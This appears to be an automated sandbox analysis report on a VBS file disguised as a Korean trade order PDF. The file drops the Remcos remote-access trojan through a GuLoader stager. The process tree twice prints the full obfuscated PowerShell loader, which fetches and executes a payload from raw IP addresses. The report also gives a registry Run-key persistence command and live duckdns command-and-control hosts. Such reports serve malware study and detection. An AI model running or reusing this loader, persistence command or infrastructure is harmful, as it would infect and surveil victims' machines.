Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    24-06-2024 15:52

General

  • Target

    korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs

  • Size

    186KB

  • MD5

    8378482dfb00608563257af10d70c96d

  • SHA1

    493b67c86ea9ca8ecb60f0388356ff0b8c1b5f40

  • SHA256

    028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72

  • SHA512

    b31c395abe57132700c6056de274dbfa92fc105d0e35c73618ec004f0639acbd3411b252374ea4a14a805cb5e4dfd817e7ca7f9096a4931f22a060e7938ec3a7

  • SSDEEP

    3072:BmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZz:B08GxbKja3+DCbKCvBB/WnHXC/sLJFJ2

Malware Config

Extracted

Family

remcos

Botnet

NJARI

C2

iwarsut775laudrye2.duckdns.org:57484

iwarsut775laudrye2.duckdns.org:57483

iwarsut775laudrye3.duckdns.org:57484

hjnourt38haoust1.duckdns.org:57484

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    sfvnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shietgtst-BB0OO6

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"
        3⤵
          PID:2680
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2436
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"
            4⤵
              PID:2548
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2840
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Corynebacterium" /t REG_EXPAND_SZ /d "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\Triennales253\').Udstraalingen;%Chorobates% ($Ledebjlke)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2756
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Corynebacterium" /t REG_EXPAND_SZ /d "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\Triennales253\').Udstraalingen;%Chorobates% ($Ledebjlke)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2032

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\149C06M5US0JVTM1GQSQ.temp
        Filesize

        7KB

        MD5

        11c8d663006e8d7b0f3cd4d1c7f9137c

        SHA1

        134ec26c1013e2f4add407426c14c355b81ba868

        SHA256

        ebc5cfb97a462d7399c7f721cddd450fd48582937380e8fdee07d945ac50ee72

        SHA512

        62cd1e280855531834b1b32db650823bed40eb06fff724c2ed5ee303641a55df849271348873f7e40d9704c4ab936da62867214effd3f31d9ec18350acc692ad

      • C:\Users\Admin\AppData\Roaming\Tvangsarbejde.Afv
        Filesize

        467KB

        MD5

        ebc603f013333acdb9edeeec3419d49d

        SHA1

        d2ae4118a93874422ffa464dc225e7da16483a91

        SHA256

        d56548cb4c363a5243f55e8602b2f45050cdcc89fae1dbe79f38488a4cac509b

        SHA512

        ec13e53881778cda945c180452d8ab49b90068f136462b3c0e31789dc9306b178e4ade472f5ebcadbc420405773a0a303bb92bec16b666114c2e5b21e94967d1

      • memory/2436-32-0x0000000006860000-0x000000000B51E000-memory.dmp
        Filesize

        76.7MB

      • memory/2708-24-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

      • memory/2708-25-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

      • memory/2708-26-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

      • memory/2708-21-0x000007FEF590E000-0x000007FEF590F000-memory.dmp
        Filesize

        4KB

      • memory/2708-23-0x0000000002210000-0x0000000002218000-memory.dmp
        Filesize

        32KB

      • memory/2708-22-0x000000001B770000-0x000000001BA52000-memory.dmp
        Filesize

        2.9MB

      • memory/2708-33-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

      • memory/2708-34-0x000007FEF590E000-0x000007FEF590F000-memory.dmp
        Filesize

        4KB

      • memory/2708-40-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
        Filesize

        9.6MB

      • memory/2840-36-0x0000000000350000-0x00000000013B2000-memory.dmp
        Filesize

        16.4MB

      • memory/2840-37-0x00000000013C0000-0x000000000607E000-memory.dmp
        Filesize

        76.7MB